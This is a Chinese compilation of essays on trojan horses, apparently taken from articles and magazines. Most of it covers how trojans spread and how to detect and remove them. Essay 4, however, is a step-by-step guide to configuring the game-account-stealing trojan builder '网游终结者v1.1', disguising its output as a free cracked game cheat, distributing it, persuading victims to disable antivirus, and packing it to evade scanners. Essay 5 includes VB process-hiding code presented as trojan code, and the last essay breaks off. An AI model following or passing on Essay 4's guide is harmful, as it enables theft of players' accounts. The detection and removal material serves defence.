木马程序范文
时间:2023-10-15 21:25:20
木马程序篇1
关键词 木马 入侵 清除
随着社会信息化技术的发展,网络已成为人们生活中不可缺少的部分。人们在工作、学习和业余等时间运用电脑,在感受网络带来益处的同时,各种各样的病毒也让使用者头痛不已,木马病毒就是其中一种。有的黑客会利用木马来盗取计算机用户的隐私去谋取利益,这给人们的生活带来了巨大的损失和危害。木马是黑客最常用的基于远程控制的工具,目前比较有名的主要有:“冰河”、“黑洞”、“黑冰”、“Bo2000”等。计算机一旦被木马病毒侵入,可能会造成信息的丢失、系统的破坏甚至系统瘫痪,所以计算机的安全问题是目前急需解决的问题。
1 木马病毒
所谓木马(全称是特洛伊木马)是利用计算机程序漏洞侵入后窃取文件的程序,它是一种与远程计算机之间建立起连接,使远程计算机能够通过网络控制本地计算机的程序。它包含两部分:服务器和控制器,黑客利用控制器进入运行了服务器(被入侵的电脑)的计算机。运行了程序的服务器,其计算机就会有一个或几个端口被打开,使黑客可以利用这些打开的端口进入计算机系统。
2 木马病毒的入侵
木马入侵计算机,一般都要完成“向目标主机传播木马”、“启动和隐藏木马”、“建立连接”、“远程控制”等环节。它的入侵方式主要有:
(1)电子邮件传播。攻击者将木马程序伪装成邮件的附件发送出去,收件人只要打开附件系统就会感染木马;(2)网络下载传播。一些非正规的网站利用木马小的特点将木马捆绑在软件安装程序上提供给用户下载,只要用户一运行这些程序,木马就会自动安装;(3)远程入侵传播。黑客通过破解密码和建立IPC$远程连接后登录到主机,将木马服务端程序复制到计算机中的文件夹,然后通过远程操作来控制木马进而达到目的;(4)利用系统漏洞植入。有时候服务器会出现漏洞,黑客便利用这些漏洞将木马植入计算机。譬如MIME漏洞,因为MIME简单有效,加上宽带网的流行,令用户防不胜防;(5)修改文件关联。隐蔽是木马常用的攻击手段,它们通常采用修改文件打开关联来达到加载的目的。著名的木马冰河就是采用这种方式。
3 木马的检测
(1)进程和端口检测。木马一般是以exe后缀形式的文件存在,因此当木马的服务器端运行时,一定会出现在进程中。查看端口的方法一般有三种:使用Windows本身自带netstat的工具,命令是C:\> netstat -an ;使用Windows命令行工具fport,命令是E:\software>Fport.exe ;使用图形化界面工具Active Potrs,这个工具可以监视到计算机所有打开的TCP/IP/UDP端口,还可以显示所有端口所对应程序的所在的路径。
(2)检查Win.ini和System.ini系统配置文件。在win.ini文件中,[WINDOWS]下面如果“Run=”和“Load=”等号后面结果不是空的,很可能是计算机中了木马病毒。在System.ini文件中,[BOOT]下面“shell= 文件名”,如果不是“shell=Explorer.exe”,也很可能是中了木马病毒。
(3)查看启动程序。如果木马自动加载的文件是直接通过Windows菜单上自定义添加的,一般都会放在主菜单的“开始->程序->启动”处。检查是否有可疑的启动程序,便很容易查到是否中了木马。
(4)检查注册表。注册表中木马一旦被加载,一般都会被修改。一般情况修改HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN, HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN SERVICES,HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN。目录下,查看有没有不熟悉的扩展名为EXE的自动启动文件。
(5)使用检测软件。除了手工检测木马外,还可以通过各种杀毒软件、防火墙软件和各种木马查杀工具等检测木马。
4 木马病毒的清除
检测到计算机中了木马后,马上将计算机与网路断开,然后根据木马的特征来进行清除。清除方法有:
(1)停止可疑的系统进程。木马程序在运行时会在系统进程中留下痕迹,通过查看系统进程可以发现运行的木马程序。清除木马时,首先停止木马程序的系统进程,其次修改注册表,最后清除木马文件。
(2)用木马的客户端程序清除。查看系统启动程序和注册表是否存在可疑的程序后,判断是否中了木马,如果存在木马,则查出木马文件并删除外,同时将木马自动启动程序删除。
(3)杀毒软件和查杀工具。木马程序大部分都是利用操作系统的漏洞将木马加载到系统中,利用较好较新的杀毒软件加上补丁程序,可自动清除木马程序。常用杀毒软件包括Kill3000、瑞星、木马终结者等。
(4)手工清除。在不知道木马属于何种程序的情况下应用手工清除,打开系统配置实用程序对Win.ini、System.ini进行编辑,在Win.ini中将“Run=文件名”或“Load=文件名”更改为“Run= ”或“Load= ”, 在System.ini中将“Shell=文件名”更改为“Shell=Explorer.exe”,屏蔽非法启动项,用Regedit打开注册表的键值及注册项的默认值或正常值,删除木马。
5 QQ卓越木马的查杀程序设计
掌握了木马的入侵和检测等相关知识后,我们做了一个针对QQ卓越木马的杀毒程序。整个程序的查杀毒流程如图1所示。
该程序查杀过程,首先扫描内存,接着是系统目录,然后注册表,最后对硬盘进行扫描。
内存中扫描木马进程主要用到了自定义函数FindProcByName,进程扫描开始及结束都会在状态栏及查杀结果栏中显示相应信息。自定义函数FindProcByName应用CreateToolhelp32Snapshot获取进程快照,若列表中有进程存在,用Process32First获取第一个进程的信息,若进程文件名与木马进程名字相同,则记录木马EXE程序同时记录木马DLL的程序并把他们添加到查杀列表,循环比较列表中的每个进程。若停止的话就直接跳出杀毒程序。内存扫描完之后,如果发现内存中有卓越QQ木马时,找到该木马程序的执行程序所在目录,并检测此目录下有没有木马文件,若有则进行查杀。
接着扫描注册表。主要查看系统及用户启动项的Run键值下是否有卓越QQ木马键值,若有将其删除,同时将木马计数器TrojanCnt及注册表木马计数器RegTrojanCnt加一。然后查看是否有木马文件,若有木马文件,根据卓越QQ木马键值找到其真实路径,将其.exe及.dll程序添加到查杀列表,扫描并中止该木马进程后再删除木马文件。
最后扫描硬盘。要对硬盘进行木马查杀,找到文件,经判断如果为病毒文件,将木马计数器及硬盘木马计数器加一,然后将检测结果在查杀结果中显示出。用自定义函数Length,Copy、ScanDir、CompareFileNames可以实现。
6 结束语
木马程序篇2
在网络上,如今专门通过盗取和贩卖他人网络游戏装备和网上银行账号来年利的,已经形成了一条完整的产业链。这样的产业链大致分为老板、病毒编写者、流量商、盗号者和贩卖商等多个环节,各个环节分工明确,其中“老板”处于整个链条的顶端,他对产业链的各个环节进行分工和协调。而那些层出不穷的木马病毒程序,往往都是按照这些老板的要求,由专门编写病毒的程序员开发出来的。
这些由病毒编写者专门开发出来的木马程序往往具有针对性,技术含量高。通常的杀毒软件很难进行有效查杀。
产业链中的所谓“老板”在得到想要的木马程序后,就开始在互联网中寻找下手目标,可一个一个去寻找网络游戏玩家和网上银行用户显然效率太低,这个时候,链条中的流量商就该发挥作用了。
“肉鸡”是黑客产业里的一个专用名词。在产业链中,有专门一些人,他们把一些带有远程控制功能的病毒程序通过网络植入别人的电脑中,这些电脑就成了他们手中的猎物,任由他们操纵控制,而且主人往往很难察觉,圈子里的人把这些被控制住的电脑称做“肉鸡”,那些控制肉鸡的人则被称为流量商。
做一个流量商,利润要比做老板少一些,流量商每天要做的,就是到网上抓“鸡”,并对抓到的“肉鸡”进行分类管理。
黑客抓“鸡”的方法很多,从技术上来说并不复杂,最常用的方法是,事先在一个访问量比较多的网页上种植一个木马程序,只要有人访问这个页面,那么访问者的电脑就会被这个木马程序入侵,黑客就可以通过这个木马程序控制访问者的电脑。比如QQ当中,和对方针对某一感兴趣的话题进行聊天以后,发给对方一个程序让他接收,或让他访问一个含有病毒的网页。对方在不知不觉中接收了带有远程控制功能的木马程序后,黑客就可以随时向对方的电脑指令。
何谓木马
木马,它来自古希腊的传说――特洛伊木马。在互联网中,有很多人设计病毒程序,当把这些病毒程序秘密植入到别人的电脑里后。就可以对别人的电脑进行远程控制,窥探隐私,盗取信息,这样的病毒程序就被统称为“木马”。“木马”程序是目前比较流行的病毒文件,它不会自我繁殖,也并不“刻意”地去感染其他文件,它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种者电脑的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至远程操控被种者的电脑。
木马是如何通过网页进入电脑
经常看到有人说,在输入自己账号与密码后提示密码错误,那么八九不离十就是中了木马了,其实这种是最早期的木马程序。现在已经很少有骗木马程序的程序员还按照这种监听键盘记录的思路去鳊写木马程序。现在的木马程序已经发展到通过内存提取数据来获得用户的帐号和密码。
相信大家都知道,现在有很多图片木马,就是把木马exe文件的文件头换成bmp文件的文件头,然后欺骗IE浏览器自动打开该文件,然后利用网页里的一段JAVA-script小程序调用Debug把临时文件里的bmp文件还原成木马8XO文件并拷贝到启动项里。接下来的事情很简单,你下次启动电脑的时候就是噩梦的开始了。
EML木马更是传播方便,把木马文件伪装成au-dio/x―wav声音文件,这样你接收到这个文件的时候只要浏览一下,不需要你点击任何连接,Windows就会为你代劳自动播放这个它认为是wav的音乐文件,木马就这样轻松地进入你的电脑,这种木马还可以嵌入到网页里,只要打开网页,木马就会自动运行。
木马程序篇3
摘 要:当前,黑客利用加壳等技术手段使“工业化生产病毒”成为趋势,只要从网上下载加壳工具,就可以自动生产出病毒。而具有越来越明显盗窃特性的木马类病毒将更易给受害者造成直接损失。本文阐述了我国木马病毒的发展现状及特点,探讨了防范此类病毒的具体措施。
关键词:木马;病毒;安全防范
中图分类号:G642
文献标识码:A
目前,病毒产业链越来越完善,从病毒程序开发、传播病毒到销售病毒,形成了分工明确的整条操作流程。黑客利用电脑病毒窃取的个人资料从QQ密码、网游密码到银行账号、信用卡帐号等等,包罗万象,任何可以直接或间接转换成金钱的东西,都成为黑客窃取的对象。通过分工明确的产业化操作,每天有数百甚至上千种病毒被制造出来,其中大部分是木马和后门病毒,占到全球该类病毒的三分之一左右。
1认识木马病毒
木马病毒是指寄生于用户计算机系统中,盗窃用户信息,并通过网络发送给木马设计者的病毒程序。木马通常有两个可执行程序:一个是客户端(Client),即控制端,另一个是服务端(Server),即被控制端。客户端程序用于远程控制计算机;而服务端程序,则隐藏到远程计算机中,接收并执行客户端程序发出的命令。所以当黑客通过网络控制一台远程计算机时,第一步就需要将服务端程序植入到远程计算机。为了能够让用户执行木马程序,黑客常常通过各种方式对它进行伪装。木马的服务一旦运行并被控制端连接,其控制端将享有服务端的大部分操作权限,例如给计算机增加口令,浏览、移动、复制、删除文件,修改注册表,更改计算机配置等。
2几种常见的木马病毒
(1) 反弹端口型木马:木马开发者分析了防火墙的特性后,发现防火墙对于连入的链接会进行非常严格的过滤,但是对于连出的链接却疏于防范。于是,与一般的木马相反,反弹端口型木马的服务端(被控制端)使用主动端口,客户端(控制端) 使用被动端口。
(2) 信息窃取型/密码发送型:这种木马可以找到目标机的隐藏密码,并且在受害者不知道的情况下,把它们发送到指定的信箱。
(3) 键盘记录木马:这种木马是非常简单的。它们只做一件事情,就是记录受害者的键盘敲击并且在LOG文件里查找密码。这种木马随着Windows 的启动而启动。
(4) 远程控制型:这种木马是现在使用最广泛的木马,它可以远程访问被攻击者的硬盘。只要有人运行了服务端程序,客户端通过扫描等手段知道了服务端的IP地址,就可以实现远程控制。
(5)FTP木马:这种木马可能是最简单和古老的木马,它的唯一功能就是打开21端口,等待用户连接。
(6) 程序杀手木马:上面列举的木马功能虽然形形,要想在对方机器上发挥自己的作用,须绕过防木马软件。程序杀手木马的功能就是关闭对方机器上运行的这类程序,让其他木马更好地发挥作用。
(7) 破坏型:唯一的功能就是破坏并且删除文件。可以自动的删除电脑上的DLL、INI、EXE文件。
(8) 木马:用户感染类木马后,会在本机开启HTTP、SOCKS等服务功能。黑客把受感染计算机作为跳板,以被感染用户的身份进行黑客活动,达到隐藏自己的目的。
3木马病毒的传播途径
(1) 通过E-mail:早期的木马,大多是通过发送电子邮件的方式把入侵主机信息告诉攻击者,有一些木马程序干脆把主机所有的密码用邮件的形式通知给攻击者,这样攻击者就不用直接连接攻击主机即可获得一些重要数据,如攻击OICQ密码的GOP木马。由控制端将木马程序以附件的形式夹在邮件中发送出去,收信人只要打开附件就会感染木马。
(2) 通过软件下载:一些非正规的网站以提供软件下载为名,将木马捆绑在软件安装程序上,下载后,只要运行这些程序,木马就会被自动安装了。
(3) 通过Script、ActiveX及ASP、CGI交互脚本的方式植入:由于IE 浏览器在执行Script脚本上存在安全漏洞,因此,木马就可以利用这些漏洞很容易植入被攻击的电脑。
(4) 利用一些系统漏洞植入,如著名的IIS服务器溢出漏洞:通过一个IISHACK 攻击程序使IIS服务器崩溃,同时在服务器上执行木马程序,从而植入木马。
(5) 通过移动存储设备(U盘等):主要是依赖微软操作系统Windows的Autorun(自动运行)功能,使得计算机用户在双击打开U盘的时候,自动执行木马程序,进而感染计算机系统。
4木马病毒的防范措施
木马病毒越来越隐蔽,破坏性也越来越大,给人们的日常工作和生活甚至是国家安全都带来了巨大的影响。木马实质上是一个程序,必须运行后才能工作,所以肯定会在电脑中留下珠丝马迹,我们可以从“防、查、堵、杀”四方面入手。
4.1防
必须在思想上引起高度的重视,增强安全意识,防患于未然。
(1) 增强防范意识
安装专业的防毒软件及时升级到最新版本,并打开实时监控程序;安装带有“木马墙”功能的个人防火墙软件,防止密码丢失。打开防病毒软件的“系统监控”功能,从注册表、系统进程、内存、网络等多方面对各种操作进行主动防御,达到全方位保护计算机系统安全的目的。养成良好的上网习惯,尽量从大规模门户网站或官方网站浏览信息,不随意登陆不明网站及不规范网站。不要随便打开来历不明的邮件附件或点击陌生邮件的网页链接。在浏览互联网时,若以微软IE为核心的浏览器上网,则要随时关注微软官方网站,及时升级补丁程序。
(2) 网站管理需更加严格
针对目前大量网站携带木马病毒,甚至公开贩卖病毒的现象,应加大网站管理力度,力争从源头阻击木马病毒,使之没有扩散的机会,是防范网页木马的根本。
4.2查
(1) 检查系统进程
大部分木马运行后会显示在进程管理器中,所以对系统进程列表进行分析和过滤,可以发现可疑程序。特别是利用与正常进程的CPU资源占用率和句柄数的比较,发现异常现象。
(2) 检查ini文件
木马可在Win.ini和System.ini的“run=”、“load=”、“shell=”后面加载,如果这些选项后面加载程序是你不认识的,就有可能是木马。
(3) 检查注册表
木马为了能够在开机后自动运行,往往在注册表中添加注册表项。一般来说,木马在注表中实现加载文件一般是在以下等处:HKEY_LOCAL_MACHINE\Software\ Microsoft\Windows\CurrentVersion下所有以“run”开头的键值;HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion下所有以“run”开头的键值;HKEY_USERS\. Default\Software\Microsoft\Windows\CurrentVersion下所有以“run”开头的键值。此外在注册表中的HKEY_CLASSES_ ROOT\exefile\shell\open\command=””%1”%*”处,如果其中的“%1”被修改为木马,那么每次启动一个该可执行文件时木马就会启动一次,例如著名的冰河木马就是将TXT文件的Notepad.exe改成了它自己的启动文件,每次打开记事本时就会自动启动冰河木马,做得非常隐蔽。
(4) 检查启动组
启动组也是木马藏身的好地方。启动组对应的文件夹为:C:\windows\startmenu\programs\startup,在注册表中的位置:HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Explorer\ShellFolders Startup=“C:\windows\ startmenu\programs\startup”。检查是否有可疑的启动程序,便很容易查到是否中了木马。
(5) 检查端口
远程控制型木马以及输出shell型木马,大都会在系统中监听某个端口,接收从控制端发来的命令,并执行。通过检查系统上开启的一些“奇怪”的端口,从而发现木马的踪迹。在命令行中输入netstat -na,可以清楚地看到系统打开的端口和连接。
4.3堵
(1) 堵住控制通路
通过禁用网络连接或拔掉网络,可以完全避免远端计算机通过网络对你的控制。当然,亦可以通过设置防火墙应用规则或过滤UDP、TCP、ICMP端口。
(2) 堵安全漏洞
Windows操作系统,特别是IE浏览器的安全漏洞频出,无疑给木马传播打开方便之门。及时安装Windows安全更新,多安装一个微软的安全更新程序,就能有效免疫相当一部分网页木马。将常用的第三方软件(例如RealPlayer,暴风影音、迅雷、联众世界等)及时升级到最新版本,也可以在一定程度上降低威胁。因此,我们要养成打补丁的习惯,对切断木马病毒的传播途径将具有极好的效果。
4.4杀
(1) 使用木马查杀软件
用户系统要安装木马查杀软件,实际上一般的普通杀毒软件里都包含了对木马的查杀功能。对于查杀软件,一定要经常升级,不断更新木马代码库里的数据,并通过病毒公告及时了解新木马的预防和查杀绝技。
(2) 手工删除
对于一些可疑文件,不能立即删除,因为有可能由于误删系统文件而使计算机不能正常工作。首先备份可疑文件和注册表,接着用Ultraedit32编辑器查看文件首部信息,通过可疑文件里面的明文字符对木马有一个大致了解。最后,删除木马文件及注册表中的键值。
5结束语
总之,我们要从习惯、意识、工具、机制等四个层面上确保网络安全,防止出现信息“泄密”。
参考文献:
[1] 张友生,米安然.计算机病毒与木马程序剖析[M]. 北京:北京科海电子出版社,2003.
[2] 马宜兴.网络安全与病毒防范[M].上海:上海交通大学出版社,2005.
Talking about the Trojan-Horse and the Defensive Measures in the Internet Age
LIU Hong-yan
(Doumen Radio &TV University,Zhuhai 519100, China )
Abstract: Presently, it become the tendency that hackers produce viruses in industrialization by the technical methods of the addition shell, and viruses may be producted automatically as long as the shell tool will be downloaded from the net. Trojan-horse virus that has more and more obvious burglary characteristic changes to create loses directly to the victim. This article elaborated the present situation and characteristics on our country Trojan-horse virus development, and discussed the specific safety defensive measures against the kind of viruses.
木马程序篇4
其实不论推出再多的新网游,网游木马盗号的原理都基本是一样的,只需略作改动,就可盗取任何新网游帐号装备。这里我们先来揭秘一款神秘的网游盗号木马――“网游终结者v1.1”。看看一个木马是如何通过变形,终结众多网络游戏的。
终结者木马的配置与生成
运行“网游终结者v1.1”,可看到此木马采用的是邮箱方式发送接收盗号信息的。在“发信邮箱”和“发信邮箱密码”中,输入用来发送盗号邮件的邮箱与登录密码。不过木马目前只支持163邮箱发送盗号邮件,千万不可输入其它邮箱,否则即使盗取到了极品网游帐号或装备,也无法发送网游帐号信息邮件。
小提示
设置发信邮箱时,要使用不重要的163邮箱,或者注册一个新163邮箱,否则极有可能别人用嗅探之类的方法,破解截获邮箱帐户与登录密码。破解的方法很简单,可使用“网游木马嗅探器”之类的工具,具体的操作可参看本栏目以前的文章。
在“收集邮箱”中输入用来接收盗号邮件的邮箱,收倍邮箱没有限制要求,可使用163邮箱或其它任意邮箱。要注意,收信邮箱最好不要与发信邮箱相同,否则很有可能会被别人截取收到的盗号邮件。另外,收信邮箱中可能还会收到其它一些邮件,为了与盗号邮件区分开来,可为盗号邮件设置一个醒目的邮件主题,在配置界面中“邮件主题”处输入即可。
“网游终结者v1.1”的独特,在于可以根据用户的需妻生成不同功能的盗号木马,目前支持四种网络游戏,包括“热血江湖”、“冒险岛”、“奇迹世界”和“大话西游”。其实网游盗号的原理都差不多,对程序略做修改就可以扩展功能,制作其它任意网游的盗号木马。点击界面下方的“生成热血江湖欺骗程序”按钮,,即可在当前目录下生成一个名为“热血嘉年华exe'’的程序文件。点击其它几个网游生成按钮,可分别生成“冒险小精灵,exe”、“奇迹世界烈火破解版exe”、“大话天使伴侣exe”程序文件,分别对应不同的网游盗号功能。
网游木马的伪装与
朋友们也许会发现,刚才生成的几个程序文件。似乎与一般的木马程序不同。确实如此,这几个程序其实都是“网游外挂”程序,以“热血嘉年华exe”为例,在网上搜索,可以看到许多地方都有此外挂程序的下载,还有一个开发此外挂程序的“热血嘉年华官方网站”。从网上的信息可知道,“热血嘉年华”是一个非常热门的热血江湖网游外挂。我们先下载一个真正的“热血嘉年华”,运行后可以看到外挂是需要注册的,还要求将外挂帐号与游戏帐号进行绑定。其实我们生成的盗号木马程序,与这个程序界面也是差不多的,这里暂时先不做演示,直接将生成的“热血嘉年华exe”打包成“外挂”。
将“热血嘉年华exe”与当前目录下的“MFC42D.DLL”和“MSVCRTD.DLL”文件,用WinRAR打包在一起,生成一个名为“热血嘉年华破解包rar”的压缩文件。通过迅雷博客或者游戏破解网站出去,当然也可以入侵某个游戏或外挂网站。在时一定注明这是“热血嘉年华免费破解版外挂”,这样许多想要免费大餐的游戏者就会上当了。
小提示
在打包木马程序时,注意不要遗漏了“MFC42D DLL”和“MSVCRTD.DLL”文件,否则外挂木马程序无法正常执行。
游戏盗号
当其他网游玩家下载了我们的“热血嘉年华,免费破解版外挂”后,解压并双击其中的“热血嘉年华exe”,运行这个伪装的外挂程序。可看到程序界面与真正的“热血嘉年华”差不多,只是略有差异。不过一般游戏玩家也会以为,这不过是因为外挂被破解的缘故。但事实上,这却是一个货真价实的热血江湖盗号木马程序。我们来看看木马是怎么盗号的:
首先,游戏玩家会像使用真的“热血嘉年华”外挂一样,在“注册帐号”选项页中,输入要注册的“外挂帐号”和“外挂密码”。点击“注册”按钮,即可“成功”的注册一个外挂帐号。注册成功后,切换到“绑定帐号”按钮,输入刚才注册的外挂帐号和密码,并输入游戏帐号,注意,在外挂木马界面中,比真正的外挂程序多出了一个“游戏密码”的输入项,这就是盗号的关键。再输入“游戏服务器”和验证码,点击“绑定”按钮,将会提示绑定成功。其实在绑定外挂帐号与游戏帐号时,密码已经被木马悄悄的发送出去了。但是不知情的游戏玩家,会很高兴的登录热血江湖游戏,开始使用这个外挂了……
终结者木马的迷惑性
终结者外挂木马非常具有迷惑性。我们来详细剖析一下木马的伪装诱骗招术:
首先,木马以外挂破解免费为伪装,更加吸引大量的游戏玩家中招运行木马,因而使用木马传播非常广泛与快速。
其次,木马不像普通的木马文件那样,只是一个程序文件,而是具备了真正外挂的界面,因此非常具有迷惑性。木马在发送时会有一个短暂的程序假死状态,不过在“外挂”界面中有一个提示:“绑定时比较占用系统资源,所以可能会出现假死状态……”,这就解决了许多玩家的疑惑。另外,盗号木马程序与真的外挂几乎没有两样,如果输入验证码错误。还会要求重装输入验证码。在进入游戏后,外挂的各种快捷键,如呼出外挂、开始挂机等,一样可以正常使用,甚至还能执行真外挂的某些外挂功能!
另外,木马以外挂的方式运行,因此可以很容易的突破防火墙和杀毒软件。例如盗号者可以在外挂包中加入一个说明文件,写入“本程序为破解版本,因此某些杀毒软件会报警。本程序绝无病毒!请关闭杀软!”之类的话语。常用破解版程序的用户也都明白这个“道理”,肯定会关闭杀软的。另外,也可对木马程序本身进行一下免杀,网上各种加壳免杀工具非常多,使用也很简单。至于突破防火墙,玩网游时许多玩家都会考虑关闭防火墙,另外,外挂在运行时需要注册帐号。因此肯定要连接网络,防火墙也不得不放行。
查杀终结者木马
其实明白了网游终结者木马的传播与盗号原理,查杀防范就很简单了,识别木马的关键在于看看外挂在使用时,是否需要用户输入游戏密码。如果要求输入密码的,必定是盗号木马!
木马程序篇5
关键词:木马;VB;注册表;应用程序
中图分类号:TP39文献标识码:A文章编号:1672-3198(2007)12-0259-02
“木马”原指古希腊士兵藏在木马内进入敌方城市从而占领敌方城市的故事。许多计算机用户特别是新手对安全问题了解不多,所以并不知道自己的计算机中了“木马”之后应该如何清除。关键是得知道“木马”的工作原理,在了解其原理之后,查杀木马也就变得简单易行了。
1 木马分类
(1)远程控制木马。
远程控制木马是数量最多,危害最大,同时知名度也最高的一种木马,它可以让攻击者完全控制被感染的计算机,攻击者可以利用它完成一些甚至连计算机主人本身都不能顺利进行的操作。
(2)密码发送木马。
密码发送型的木马是专门为了盗取被感染计算机上的密码而编写的,木马一旦被执行,就会自动搜索内存,Cache,临时文件夹以及各种敏感密码文件,一旦搜索到有用的密码,木马就会利用免费的电子邮件服务将密码发送到指定的邮箱。
(3)键盘记录木马。
这种特洛伊木马就是记录受害者的键盘敲击并且在LOG文件里查找密码,随着Windows的启动而启动。
(4)DoS攻击木马。
随着DoS攻击越来越广泛的应用,被用作DoS攻击的木马也越来越流行起来。当你入侵了一台机器,给他种上DoS攻击木马,那么日后这台计算机就成为你DoS攻击的最得力助手了。
(5)FTP木马。
这种木马可能是最简单的木马了,其历史悠久,它的惟一功能就是打开21端口,等待用户连接。现在新FTP木马还加上了密码功能,这样,只有攻击者本人才知道正确的密码,从而进人用户计算机。
(6)反弹端口型木马。
反弹端口型木马的服务端 (被控制端)使用主动端口,客户端 (控制端)使用被动端口。木马定时监测控制端的存在,发现控制端上线立即弹出端口主动连结控制端打开的主动端口。
2 木马的工作原理
(1)木马的隐藏。
下面是一个用vb编辑的木马程序,用于隐藏木马。
程序的具体编制操作如下:
①新建一个工程名命名为Hidden, 在工程hidden中添加模块Modulel,应用程序标题也改为Hidden。
在模块Module1中加入如下声明:
Public Declare Function GetCurrentProcessId Lib “kernel32” () As Long
'获得当前进程ID函数的声明。
Public Declare Function RegisterServiceProcess Lib “kernel32” (ByVal ProcessId As Long, ByVal ServiceFlags As Long) As Long
'在系统中注册当前进程ID函数的声明。
②在Project1中新建一个窗体Form1,设置Form1的属性:
form1.Visible=False
form1.ShowInTaskBar=False
在代码窗口添加如下代码:
Private Declare Function GetDriveType Lib “kernel32” Alias “GetDriveTypeA” (ByVal nDrive As String) As Long
'获得当前驱动器类型函数的声明。
Private Declare Function GetVolumeInformation Lib “kernel32” Alias “GetVolumeInformationA” (ByVal lpRootPathName As String, ByVal lpVolumeNameBuffer As String, ByVal nVolumeNameSize As Long, lpVolumeSerialNumber As Long, lpMaximumComponentLength As Long, lpFileSystemFlags As Long, ByVal lpFileSystemNameBuffer As String, ByVal nFileSystemNameSize As Long) As Long
'获得当前驱动器信息函数的声明:
Private Sub Form_Load()
Dim drive_no As Long, drive_flag As Long
Dim drive_chr As String, drive_disk As String
Dim serial_no As Long, kkk As Long
Dim stemp3 As String, dflag As Boolean
Dim strlabel As String, strtype As String,strc As Long
RegisterServiceProcess GetCurrentProcessId, 1 ' 从系统中取消当前进程:
strlabel = String(255, Chr(0))
strtype = String(255, Chr(0))
stemp3 = “用户c盘序列号” '用户C盘的序列号(十进制),读者可根据自己情况给出。
dflag = False
For drive_no = 0 To 25
drive_disk = Chr(drive_no + 67)
drive_chr = drive_disk & “:/”
drive_flag = GetDriveType(drive_chr)
If drive_flag = 3 Then
kkk = GetVolumeInformation(drive_chr, strlabel, Len(strlabel), serial_no, 0, 0, strtype,Len(strtype)) '通过GetVolumeInformation获得磁盘序列号:
Select Case drive_no
Case 0
strc = serial_no
End Select
If serial_no = stemp3 Then
dflag = True
Exit For
End If
End If
Next drive_no
If drive_no = 26 And dflag = False Then '非法用户
GoTo err:
End If
MsgBox (“HI,合法用户!”)
Exit Sub
err:
MsgBox (“错误!你的C:盘ID号是” & strc)
End Sub
Private Sub Form_Unload(Cancel As Integer)
RegisterServiceProcess GetCurrentProcessId, 0 '从系统中取消当前程序的进程:
End Sub
(2)木马的启动。
“木马”的启动方式有很多种,这里我们介绍几种主要的:
①在Win.ini的[windows]字段中有启动命令“load=”和“run=”,在一般情况下 “=”后面是空白的,如果有后跟程序,比方说是这个样子:
run=c:/windows/file.exeload=c:/windows/file.exe
②在system.ini文件中,在[BOOT]下面有个“shell=文件名”。正确的文件名应该是“explorer.exe”,如果不是“explorer.exe”,而是“shell= explorer.exe 程序名”。
③在注册表中的情况最复杂,通过regedit命令打开注册表编辑器,在点击至:“HKEY-LOCAL-MACHINE/ Software/ Microsoft/ Windows/ CurrentVersion/ Run”目录下,查看键值中有没有自己不熟悉的自动启动文件,扩展名为EXE。
参考文献
[1]孙锋. 网络安全与防黑技术[M]. 北京:机械工业出版社,2004.
木马程序篇6
随着计算机网络技术的迅速发展,网络安全问题已变得越来越受到人们的重视,网络攻击形式多种多样,很多蠕虫病毒、木马病毒等植入到某些网页中,给网络用户带来了很大的安全隐患,网页木马通过利用浏览器或插件的一些漏洞,在客户端下载并执行一些恶意程序进行网络攻击,它已经成为了目前恶意程序传播的一种重要方式,本文主要阐述了网页木马的机理和特点,重点分析了木马的检测以及木马的特征,并针对这些特点进行了一些相应防范对策的探讨。
【关键词】网页木马 木马机理 攻击 防范
由于网页木马制作简单、传播速度快、破坏力强。挂马形式多等原因,已经成为恶意程序传播中最常见的形式之一,给互联网用户造成严重的安全威胁。
目前国内外很多研究人员围绕网页木马的防御进行了深入的探讨与研究,同时攻击者也在采用一些更先进的手段来提高木马的攻击隐蔽性,用以提高木马的攻击成功率,因此,网页木马的机理与防范对策研究已成为了当前计算机工作者的一个重要课题。
1 网页木马工作机理与特征
(1)网页木马定义。网页木马是在宏病毒、木马等恶意代码基础上发展出来的一种新形态的恶意代码。类似于宏病毒通过Word 等文档中的恶意宏命令实现攻击。网页木马一般通过 HTML 页面中的一段恶意脚本达到在客户端下载、执行恶意可执行文件的目的,而整个攻击流程是一个“特洛伊木马式”的隐蔽的、用户无察觉的过程,因此,国内研究者通常称该种攻击方式为“网页木马”。
(2)网页木马典型攻击流程。网页木马采用的是一种被动的攻击模式,攻击者将网页木马部署在服务器端,被动的等待客户端发起访问请求,一旦有客户端访问攻击页面,服务器就将页面内容反馈给客户端,页面通过浏览器及插件漏洞将客户端攻破,进而下载、安装、执行恶意程序。其攻击流程图如图1。
(3)网页木马的漏洞利用机理。网页木马的漏洞利用机理主要是通过利用客户端浏览器以及插件的漏洞来获取攻击权限,一旦获取攻击权限后就会进行恶意程序的下载和执行。这些漏洞的脚本语言主要是JavaScript等,一方面在于浏览器提供了脚本语言与插件间进行交互的 API,攻击脚本通过畸形调用不安全的 API 便可触发插件中的漏洞;另一方面,攻击者也可以利用脚本的灵活特性对攻击脚本进行一定的混淆处理来对抗反病毒引擎的安全检查。网页木马利用的漏洞主要有两类,一类是任意下载 API 类漏洞,另一类是内存破坏类漏洞。
(4)网页木马涉及的关键手段。网页木马采用基于Web的客户端攻击方式,它作为一种新型的恶意代码,在结构和组成上与普通的病毒恶意代码有很大区别,在木马程序中,攻击者通常采用一些灵活多变的攻击技术和手段来提高网页木马的成功率和隐蔽性。攻击者通常采用“环境探测+动态加载”的模式来应对客户端环境的复杂多样性,采用一种all-in-one 的方式将针对不同漏洞的攻击代码全部包含进单个攻击页面中。但这种方式能使得浏览器反应迟缓,容易引起用户的察觉,为了提高攻击的隐蔽性和成功率,攻击者采用“一个探测页面+多个攻击脚本/攻击页面”的“环境探测+动态加载”模式,这种模式在提升攻击成功率的同时,也增加了攻击的隐蔽性和攻击效率。此外,网页木马还具有增强自身隐蔽性的手段,攻击者往往采用混淆免杀、人机识别、动态域名解析等一些技术手段来提升攻击的隐蔽性。
2 网页木马防范对策研究
